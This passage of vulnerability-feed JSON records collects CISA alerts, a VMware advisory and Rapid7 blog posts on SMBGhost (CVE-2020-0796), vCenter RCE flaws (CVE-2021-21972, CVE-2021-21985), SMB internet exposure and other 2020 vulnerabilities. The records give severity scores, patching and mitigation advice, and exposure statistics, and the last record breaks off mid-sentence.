"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-05T00:00:00", "id": "CISA:9D38592E642AD30FA4BC435AC4FFC304", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:52", "description": "Microsoft has released a security advisory to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker can exploit this vulnerability to take control of an affected system. SMB is a network file-sharing protocol that allows client machines to access files on servers.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) and the CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>) and apply the the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/11/microsoft-server-message-block-rce-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "cisa", "title": "Microsoft Server Message Block RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/11/microsoft-server-message-block-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:35", "description": "Microsoft has released out-of-band security updates to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker could exploit this vulnerability to take control of an affected system. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates or workarounds. \n\u2022 Microsoft Security Guidance for [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) \n\u2022 Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) \n\u2022 CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/12/microsoft-releases-out-band-security-updates-smb-rce-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for SMB RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": "CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/12/microsoft-releases-out-band-security-updates-smb-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2023-12-02T16:15:24", "description": "3a. VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21972) \n\nThe vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. ESXi OpenSLP heap-overflow vulnerability (CVE-2021-21974) \n\nOpenSLP as used in ESXi has a heap-overflow vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. \n\n3c. VMware vCenter Server updates address SSRF vulnerability in the vSphere Client (CVE-2021-21973) \n\nThe vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-23T00:00:00", "type": "vmware", "title": "VMware ESXi and vCenter Server updates address multiple security vulnerabilities (CVE-2021-21972, CVE-2021-21973, CVE-2021-21974)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-23T00:00:00", "id": "VMSA-2021-0002", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-05T15:09:20", "description": "\n\n_This blog post was co-authored by Bob Rudis and Caitlin Condon. _\n\n## What\u2019s up?\n\nOn Feb. 23, 2021, VMware published an [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) (VMSA-2021-0002) describing three weaknesses affecting VMware ESXi, VMware vCenter Server, and VMware Cloud Foundation.\n\nBefore digging into the individual vulnerabilities, it is vital that all organizations that use the HTML5 VMware vSphere Client, i.e., VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2) _immediately_ restrict network access to those clients\u2014especially if they are not segmented off on a management network\u2014implement the mitigation noted below, and consider performing accelerated/immediate patching on those systems.\n\n## Vulnerability details and recommendations\n\n**CVE-2021-21972 **is a critical (CVSSv3 base 9.8) unauthenticated remote code execution vulnerability in the HTML5 vSphere client. Any malicious actor with access to port 443 can exploit this weakness and execute commands with unrestricted privileges. \n\nPT Swarm has [provided a detailed walkthrough](<https://swarm.ptsecurity.com/unauth-rce-vmware/>) of this weakness and how to exploit it.\n\nRapid7 researchers have independently analyzed, tested, and confirmed the exploitability of this weakness and have provided [a full technical analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=blog#rapid7-analysis>).\n\nProof-of-concept working exploits are beginning to appear on public code-sharing sites.\n\nOrganizations should restrict access to this plugin and patch affected systems immediately (i.e., not wait for standard patch change windows).\n\nVMware has [provided steps for a temporary mitigation](<https://kb.vmware.com/s/article/82374>), which involves disabling the plugin.\n\n**CVE-2021-21973 **is an important (CVSSv3 base 8.8) heap-overflow-based remote code execution vulnerability in VMware ESXi OpenSLP. Attackers with same-segment network access to port 427 on affected systems may be able to use the heap-overflow weakness to perform remote code execution.\n\nVMware has [provided steps for a temporary mitigation](<https://kb.vmware.com/s/article/76372>), which involves disabling the SLP service on affected systems.\n\nRapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.\n\n**CVE-2021-21974** is a moderate (CVSSv3 base 5.3) server-side request forgery vulnerability affecting the HTML5 vSphere Client. Attackers with access to port 443 of affected systems can use this weakness to gain access to underlying system information.\n\nVMware has [provided steps for a temporary mitigation](<https://kb.vmware.com/s/article/82374>), which involves disabling the plugin.\n\nSince attackers will already be focusing on VMware systems due to the other high-severity weaknesses, Rapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.\n\n## Attacker activity\n\nRapid7 Labs has not detected broad scanning for internet-facing VMware vCenter servers, but Bad Packets [has reported](<https://twitter.com/bad_packets/status/1364661586070102016?s=20>) that they\u2019ve detected opportunistic scanning. We will continue to monitor Project Heisenberg for attacker activity and update this blog post as we have more information.\n\n## Updates\n\n**2021-03-02** \u2022 As per our [updated analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), members of the cybersecurity community (h/t to [@0x80O0oOverfl0w](<https://twitter.com/0x80O0oOverfl0w>)) have confirmed active, [opportunistic exploitation is occurring](<https://twitter.com/0x80O0oOverfl0w/status/1366754245870030849>). Rapid7 Labs has also identified active probing for internet-facing VMware vCenter instances. If your organization has not prioritized patching for this vulnerability Rapid7 strongly urges you to do so as soon as possible. \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-02-24T22:22:14", "type": "rapid7blog", "title": "VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T22:22:14", "id": "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "href": "https://blog.rapid7.com/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T08:39:07", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMB (TCP/445)\n\n_Choosy worms choose SMB._\n\n#### TLDR\n\n**WHAT IT IS: **SMB is the Windows everything protocol, but is usually used for Windows-based file transfers.\n\n**HOW MANY:** 593,749 discovered nodes\n\n**VULNERABILITIES: **The most destructive internet worms in history use SMB in some way.\n\n**ADVICE: **Direct access to SMB outside of an unroutable, local network should be prohibited as a general rule.\n\n**ALTERNATIVES:** HTTPS-based file sharing is usually the answer for whatever file hosting SMB was intending, but most SMB exposures seem to be accidental.\n\n**GETTING:** Better! ZOMGOSH! Thanks mostly to ISPs, there was a 16% decrease in exposure from 2019.\n\n### SMB discovery details\n\nSMB is a continued source of heartache and headaches for network operators the world over. Originally designed to operate on local area network protocols like NetBEUI and IPX/SPX, SMBv1 was ported to the regular TCP/IP network that the rest of the internet runs on. Since then, SMBv2 and SMBv3 have been released. While SMB is primarily associated with Windows-based computers for authentication, file sharing, print services, and process control, SMB is also maintained for non-Windows operating systems in implementations such as Samba and Netsmb. As a binary protocol with negotiable encryption capabilities, it is a complex protocol. This complexity, along with its initial proprietary nature and deep couplings with the operating system kernel, makes it an ideal field for discovering security vulnerabilities that can enable remote code execution (RCE). On top of this, the global popularity of Windows as a desktop operating system ensures it remains a popular target for bug hunters and exploiters alike.\n\n\n\n### Exposure information\n\nMany of the most famous vulnerabilities, exploits, and in-the-wild worms have leveraged SMB in some way. [WannaCry](<https://blog.rapid7.com/2019/05/13/wannacry-two-years-on-current-threat-landscape-forgotten-lessons-and-hope-for-the-future/https://blog.rapid7.com/2019/05/13/wannacry-two-years-on-current-threat-landscape-forgotten-lessons-and-hope-for-the-future/>) and [NotPetya](<https://www.rapid7.com/security-response/petya/>) are two of the most recent events that centered on SMB, both for exploitation and for transmission. Prior SMB-based attacks include the Nachi and Blaster worms (2003\u20132005), and future SMB-based attacks will likely include [SMBGhost](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost>). In addition to bugs, intended features of SMB\u2014notably, automatic hash-passing\u2014make it an ideal mechanism to steal password hashes from unsuspecting victims, and SMB shares (network-exposed directories of files) continue to be accidentally exposed to the internet via server mismanagement and too-easy-to-use network-attached storage (NAS) devices.\n\nAs expected, the preponderance of SMB services available on the internet are Windows-based, but the table below shows there is also a sizable minority of non-Windows SMB available.\n\nSMB Server Kind | Count \n---|--- \nWindows (Server) | 298,296 \nLinux/Unix/BSD/SunOS (Samba) | 170,095 \nWindows (Desktop) | 110,340 \nQNAP NAS Device | 10,164 \nOther/Honeypot | 1,914 \nApple Time Capsule or macOS | 1,465 \nWindows (Embedded) | 703 \nKeenetic NAS | 647 \nPrinter | 386 \nZyxel NAS | 6 \nEMC NAS | 5 \n \nAs you can see, these non-Windows nodes are typically some type of NAS system used in otherwise largely Windows environments, and are responsible for maintaining nearline backup systems. While these devices are unlikely to be vulnerable to exactly the same exploits that dog Windows systems, the mere fact that these **backups are exposed to the internet** means that, eventually, these network operators are Going To Have A Bad Time if and when they get hit by the next wave of ransomware attacks.\n\n### Unattended installs\n\nOf the Windows machines exposed to the internet, we can learn a little about their provenance from the Workgroup strings that we're able to see from [Sonar scanning](<https://www.rapid7.com/research/project-sonar/>). The list below indicates that the vast majority of these machines are using the default WORKGROUP workgroup, with others being automatically generated as part of a standard, unattended installation. In a magical world where SMB is both rare and safe to expose to the internet, we would expect those machines to be manually configured and routinely patched.\n\nThis is not the case, though\u2014these Windows operating systems were very likely installed and configured automatically, with no special care given to their exposed-to-the-internet status, so the exposure is almost certainly accidental and not serving some special, critical business function. Additionally, these aftermarket-default WORKGROUPS are also giving away hints about which specific Windows- or Samba-based build is being used in production environments, and can give attackers ideas about targeting those systems.\n\nWorkgroup | Count \n---|--- \n`WORKGROUP` | 204,014 \n`WIN-<string e.g. 4RGO6K0U19F>` | 98,153 \n`MICROSO-<string e.g. HCBD8KK>` | 27,213 \n`SERVER[####]` | 15,721 \n`HK-<number e.g. 2723>` | 12,823 \nIP Address | 10,367 \n`DESKTOP-<string e.g. HUDL8UO>` | 7,203 \n`HKSRV[####]` | 6,160 \n`RS-<string e.g. A2-084` | 6,017 \n`XR-<string e.g. 20190714REWT>` | 4,448 \n`QNSERVER[####]` | 4,067 \n`PC-<string e.g. HCBD8KK>` | 4,034 \n`CCSERVER[####]` | 3,807 \n`SVR-<number e.g. 20191106VUM>` | 3,303 \n`MYGROUP` | 3,269 \n`MSHOME` | 3,060 \n`SRV*` | 2,910 \n`SERVER` | 2,476 \n`VM*` | 2,186 \n`TKO[####]` | 2,088 \n \n### Attacker\u2019s view\n\nRegardless of the version and configuration of cryptographic and other security controls, SMB is inappropriate for today's internet. It is too complex to secure reliably, and critical vulnerabilities that are attractive to criminal exploitation continue to surface in the protocol. With that said, SMB continues to be a critical networking layer in office environments of any size, and since it\u2019s native to TCP/IP, network misconfigurations can inadvertently expose SMB-based resources directly to the internet. **Every organization should be continually testing its network ingress and egress filters for SMB traffic**\u2014not only to prevent outsiders from sending SMB traffic to your accidentally exposed resources, but to prevent internal users from accidentally leaking SMB authentication traffic out into the world.\n\nApproximately 640,000 unique IP addresses visited our high-interaction SMB honeypots over the measured period, but rather than think of this as a horde of SMB criminals, we should recall that the vast majority of those connections are from machines on the internet that were, themselves, compromised. After all, that's how worms work. Very few of these connections were likely sourced from an attacker's personally owned (rather than pwned) machine. With this in mind, our honeypot traffic gives us a pretty good idea of which countries are, today, most exposed to the next SMB-based mega-worm like WannaCry: Vietnam, Russia, Indonesia, Brazil, and India are all at the top of this list.\n\n\n\nAmong the cloud providers, things are more stark. EternalBlue, the exploit underpinning WannaCry, was responsible for about 1.5 million connections to our honeypots from Digital Ocean, while Microsoft Azure was the source of about 8 million (non-EternalBlue) connections (of which, about 15%, or 1.2 million or so, were accidental connections due to a misconfiguration at Azure). We're not yet sure why this wild discrepancy in attack traffic versus accidental traffic exists between Digital Ocean and Azure, but we suspect that Microsoft is much more aggressive about making sure the default offerings at Azure are patched against MS17-010, while Digital Ocean appears to be more hands-off about patch enforcement, leaving routine maintenance to its user base.\n\n\n\n### Our advice\n\n**IT and IT security teams** should prohibit SMB access to, or from, their organization over anything but VPN-connected networks, and regularly scan their known, externally facing IP address space for misconfigured SMB servers. \n\n**Cloud providers** should prohibit SMB access to cloud resources, and at the very least, routinely scrutinize SMB access to outside resources. Given that approximately 15% of our inbound honeypot connections over SMB from Microsoft Azure are actually misconfigurations, rather than attacks or research probes, Azure should be especially aware of this common flaw and make it difficult to impossible to accidentally expose SMB at the levels that are evident today.\n\n**Government cybersecurity agencies **should be acutely aware of their own national exposure to SMB, and institute routine scanning and notification programs to shut down SMB access wherever it surfaces. This is especially true for those countries that are at the top of our honeypot source list.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-09-18T15:11:21", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMB", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-18T15:11:21", "id": "RAPID7BLOG:614648646663CF660156AD39ED9421B3", "href": "https://blog.rapid7.com/2020/09/18/nicer-protocol-deep-dive-internet-exposure-of-smb/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T14:42:12", "description": "\n\nSpooky season is in full swing, and we\u2019re not just talking about Halloween. [Security vulnerabilities](<https://www.rapid7.com/fundamentals/vulnerabilities-exploits-threats/>) can range from tiny errors to large-scale gaps in protection, and all have different consequences. We put together a list of some of the scariest vulnerabilities of the year (the tricks!) and the remediation solutions that can help you stay on guard in the future (the treats!).\n\n## [SMBghost](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=search>)\n\n\n\n**The Trick: **SMBghost is a [buffer overflow vulnerability](<https://blog.rapid7.com/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/>) when compression is enabled in Microsoft SMB Servers. The vulnerability is due to an error when the vulnerable software handles a maliciously crafted compressed data packet. A remote, unauthenticated attacker can exploit this to execute arbitrary code within the context of the application. Yikes!\n\nThe impact that the exploitation of this vulnerability has is very high, due to this having the ability to be exploited remotely and the sense that it grants system-level access in kernel mode. This vulnerability has also been deemed as wormable, which makes it a priority for attackers to utilize.\n\n**The Treat: **Though the attacker value is very high, most [AttackerKB](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost>) users have noted that the vuln\u2019s exploitability is relatively low. Microsoft has since released a patch for this vulnerability and suggests that users take proper precaution when enabling compression within SMB. Now, with many knowledge workers still stuck at home thanks to the pandemic, and therefore not spending a lot of time hanging out in SMB-heavy environments, this sequestration might actually be limiting the value of this and other SMB vulnerabilities\u2014maybe working from home might actually be good for security!\n\n## [BlueGate](<https://attackerkb.com/topics/Er1dwnOh2a/windows-remote-desktop-gateway-rce-cve-2020-0609?referrer=search>)\n\n\n\n**The Trick: **A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights. A ghost-like attacker messing with your data? Pretty spooky.\n\n**The Treat: **This ghost is probably going away with regular and timely security patches. Though it goes against expert advice to deploy right smack on the internet, maintainers of such servers just need to keep up on their patches in the same way a typical IIS administrator does. The Microsoft-issued update addresses the vulnerability by correcting how RD Gateway handles connection requests.\n\n## [Ripple20](<https://attackerkb.com/topics/EZhbaWNnwV/ripple20-treck-tcp-ip-stack-vulnerabilities?referrer=search>)\n\n\n\n**The Trick: **In June, security firm JSOF published research on a collection of 19 vulnerabilities in a low-level TP/IP software library developed by Trek, a company that has distributed embedded internet protocols since the \u201990s. The 19 vulnerabilities \u201caffect hundreds of millions of devices (or more),\u201d thanks to the ripple effect of the supply chain. Consider \u201c19\u201d to be quite the opposite of a magic number. The 19 vulnerabilities are not equal in their severity and potential impact and are likely to persist for some time. \n\n\n**The Treat: **Is there any good news? Well, the practical attacker value of this suite of vulnerabilities is, on the whole, relatively low. This is in large part because of the lack of attack scalability: Each attack will, in all likelihood, need to be tailor-made for the target device, and even the value of targeting specific devices is heavily dependent on device capabilities and the context in which that device is used. The Treck TCP/IP stack is geared toward low-resource devices, which makes the Ripple20 vulnerabilities significantly less likely to be targeted in resource-heavy attacks such as crypto-mining or ransomware campaigns. If users want to change course from a scary ending to a happy one, users are best served by applying detections at the edge and internal network level to filter out malformed TCP/IP packets, IP fragments, and other lesser-used networking features, where possible.\n\n## [Bad Neighbor](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor-ping-of-death-redux>)\n\n\n\n**The Trick:** Bad Neighbor is a remote code execution vulnerability that arises when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploits this vulnerability could gain the ability to execute code on the target server or client. The vulnerability has garnered broad attention as potentially wormable. This bad neighbor is probably someone who gives out wormable apples instead of candy.\n\n**The Treat: **You can\u2019t call the homeowners association on this one, but we recommend applying the patch for CVE-2020-16898 (Bad Neighbor) as soon as possible. For those who are unable to patch immediately, consider disabling ICMPv6 RDNSS as a workaround.\n\n## [RECON](<https://blog.rapid7.com/2020/07/14/pay-attention-to-your-sap-security/>)\n\n\n\n**The Trick: **This critical [SAP vulnerability (RECON)](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java#rapid7-analysis>) from July affects the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard. Though a few months have passed since its publication, it\u2019s still a big deal, especially since exploit code is publicly available. Businesses rely on SAP for a wide variety of processes, capturing everything from financial data to business intelligence. Most organizations use it as a tool to manage compliance and ensure access is provisioned (and, more importantly, deprovisioned) with urgency. The critical component to this vulnerability is that it does not require authentication to exploit, meaning any SAP NetWeaver system with the vulnerable components exposed to the internet\u2014currently estimated to be at least 4,000\u2014can be trivially compromised to wreak havoc on business systems. _So, yeah, this one is big-time scary._\n\n**The Treat:** This trick feels more like a long con. And how do you unravel the layers and remediate a long con? Conversations should begin with IT by identifying which physical or virtual assets are affected. SAP NetWeaver serves as the base layer for many SAP products, so many applications and processes are likely affected. Understanding how many systems you need to apply this patch to will help you begin to communicate estimated downtime to the business. Treating vulnerabilities, especially severe ones like this, is an exercise in diplomacy, politics, and trade-offs. For some, this will require removing SAP\u2019s direct access to the internet. For others, it will require implementing WAF and/or IPS rules. CISA strongly recommends closely monitoring SAP NetWeaver AS for anomalous activity. SAP customers should be on the lookout for unusual processes spawned under the context of users that match the &lt;sid&gt;adm naming convention. File metadata may also be a good way to identify when SAP NetWeaver software spawns non-SAP binaries. Rapid7 also recommends ensuring that any web service does not run using a privileged account. For others, it will result in accepting the risk. The key message here is to sit down with all stakeholders, including business leaders, to get on the same page about the severity of this vulnerability, develop and activate a treatment plan, and make sure to have, at a minimum, detective controls in place to respond.\n\n## [SigRed](<https://attackerkb.com/topics/egp32neD6z/cve-2020-1350-windows-dns-server-remote-code-execution-sigred>)\n\n\n\n**The Trick: **A remote code execution vulnerability codenamed \u201cSigRed\u201d exists in Windows Domain Name System servers when they fail to properly handle requests. Successful exploitation can result in domain administrator privileges, compromising critical business data, assets, and infrastructure. If that wasn\u2019t scary enough, Homeland Security decided to get involved. The U.S. Department of Homeland Security issued an emergency directive on July 16, 2020 requiring federal agencies to patch or mitigate the vulnerability within 24 hours\u2014only the third time CISA\u2019s current director has taken such an action. As with any vulnerability known to be wormable, CVE-2020-1350, or SigRed, will make an attractive target for ransomware campaigns in addition to stealthier threat actors.\n\n**The Treat: **CISA put out urgent guidance to those who have Windows servers running DNS: patch on an emergency basis. Microsoft released guidance on mitigations for those who cannot patch, but as with other recent high-severity, high-urgency vulnerabilities, it is highly recommended that defenders prioritize patching over mitigation wherever possible. When attacker value is this high, don\u2019t just run for the hills\u2014instead, follow the rules and prioritize patching to keep monsters out of your servers.\n\n## [Curveball](<https://blog.rapid7.com/2020/01/16/cve-2020-0601-windows-cryptoapi-spoofing-vulnerability-what-you-need-to-know/>)\n\n\n\n**The Trick: **In January,** **a flaw [(CVE-2020-0601 or Curveball)](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0601>) was found in the way the Microsoft Windows CryptoAPI performs certificate validation, allowing attackers to spoof X.509 vulnerabilities. This is core cryptographic functionality used by a number of different software components, with far-reaching impact ranging from programming languages to web browsers.\n\n**The Treat: **This year started out with a fright, but there are some silver linings. The mitigation steps taken by Microsoft and others (e.g., Google Chrome) to detect and alert users to exploitation attempts are a welcome development for defenders and users. Windows Update services were not affected by this due to extended hardening in years past, showing that defense-in-depth is important for maintaining critical infrastructure. This vulnerability also highlights a specification flaw that software projects should heed: Untested features are likely vulnerable features. Because this vulnerability is in an extremely seldom-used feature of the TLS specification that allows users to specify their own elliptical curves, it meant the feature was largely untested. Vulnerability hunters and defenders may be on the lookout for similar bugs in other TLS implementations in the future.\n\nIt\u2019s Halloween, not April fools, and these vulnerabilities are no joke. As with any security scare, it\u2019s important not only to remediate, but to reflect on what we can learn from these mistakes. If you\u2019re looking for more visibility into which of these vulnerabilities is present in your organization, learn more about [our vulnerability management tool, InsightVM](<https://www.rapid7.com/products/insightvm/>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-29T13:59:06", "type": "rapid7blog", "title": "Trick or Treat! What We Can Learn from the Spookiest Vulnerabilities of the Year", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0796", "CVE-2020-1350", "CVE-2020-16898", "CVE-2020-6287"], "modified": "2020-10-29T13:59:06", "id": "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "href": "https://blog.rapid7.com/2020/10/29/trick-or-treat-what-we-can-learn-from-the-spookiest-vulnerabilities-of-the-year/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-05T16:53:27", "description": "\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server (6.5, 6.7, and 7.0) and VMware Cloud Foundation (3.x and 4.x). The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nWhile there are no reports of exploitation in the wild as of May 26, 2021, defenders may remember that CVE-2021-21972, another critical vCenter Server vulnerability from earlier this year, saw widespread exploitation within a few days of disclosure. It is likely that this latest severe flaw will follow suit, and we strongly recommend patching on an emergency basis, particularly given the increased 